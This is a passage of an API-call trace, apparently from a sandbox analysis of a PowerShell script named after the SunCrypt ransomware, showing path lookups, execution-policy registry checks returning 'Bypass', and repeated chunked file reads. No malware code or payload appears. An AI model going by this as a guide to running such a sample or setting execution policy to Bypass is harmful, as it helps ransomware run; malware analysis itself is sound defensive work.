lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef48) returned 1 [0081.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf20c | out: lpFileInformation=0x4ebf20c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef44) returned 1 [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf154 | out: phkResult=0x4ebf154*=0x0) returned 0x2 [0081.064] GetEnvironmentVariableW (in: lpName="PSExecutionPolicyPreference", lpBuffer=0x4ebf094, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf190 | out: phkResult=0x4ebf190*=0x0) returned 0x2 [0081.065] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf190 | out: phkResult=0x4ebf190*=0x4bc) returned 0x0 [0081.065] RegQueryValueExW (in: hKey=0x4bc, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x4ebf1b0, lpData=0x0, lpcbData=0x4ebf1ac*=0x0 | out: lpType=0x4ebf1b0*=0x1, lpData=0x0, lpcbData=0x4ebf1ac*=0xe) returned 0x0 [0081.065] RegQueryValueExW (in: hKey=0x4bc, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x4ebf1b0, lpData=0x1da972c, lpcbData=0x4ebf1ac*=0xe | out: lpType=0x4ebf1b0*=0x1, lpData="Bypass", lpcbData=0x4ebf1ac*=0xe) returned 0x0 [0081.065] RegCloseKey (hKey=0x4bc) returned 0x0 [0081.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebf1a0) returned 1 [0081.067] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4bc [0081.067] GetFileType (hFile=0x4bc) returned 0x1 [0081.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebf19c) returned 1 [0081.067] GetFileType (hFile=0x4bc) returned 0x1 [0081.068] GetACP () returned 0x4e4 [0081.073] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x0 [0081.073] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.075] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1000 [0081.075] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.077] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2000 [0081.077] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.077] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3000 [0081.077] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.078] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4000 [0081.078] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.078] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5000 [0081.078] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.079] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6000 [0081.079] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.079] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7000 [0081.079] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8000 [0081.080] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9000 [0081.080] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.081] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa000 [0081.081] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.081] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd000 [0081.082] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe000 [0081.083] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf000 [0081.083] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.084] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10000 [0081.084] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.084] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11000 [0081.084] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.086] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12000 [0081.086] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.086] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13000 [0081.086] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.087] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14000 [0081.087] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.087] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15000 [0081.087] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16000 [0081.088] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x17000 [0081.088] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.088] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x18000 [0081.089] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.089] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x19000 [0081.089] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.090] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1a000 [0081.090] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.090] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1b000 [0081.090] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1c000 [0081.091] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1d000 [0081.091] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.092] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1e000 [0081.092] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.092] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x1f000 [0081.092] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.093] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x20000 [0081.093] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.093] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x21000 [0081.093] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.094] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x22000 [0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.095] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x23000 [0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.095] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x24000 [0081.095] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.096] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x25000 [0081.096] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.096] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x26000 [0081.096] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x27000 [0081.097] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x28000 [0081.097] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x29000 [0081.098] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.099] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2a000 [0081.099] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.099] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2b000 [0081.099] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.100] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2c000 [0081.100] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.100] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2d000 [0081.100] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.101] 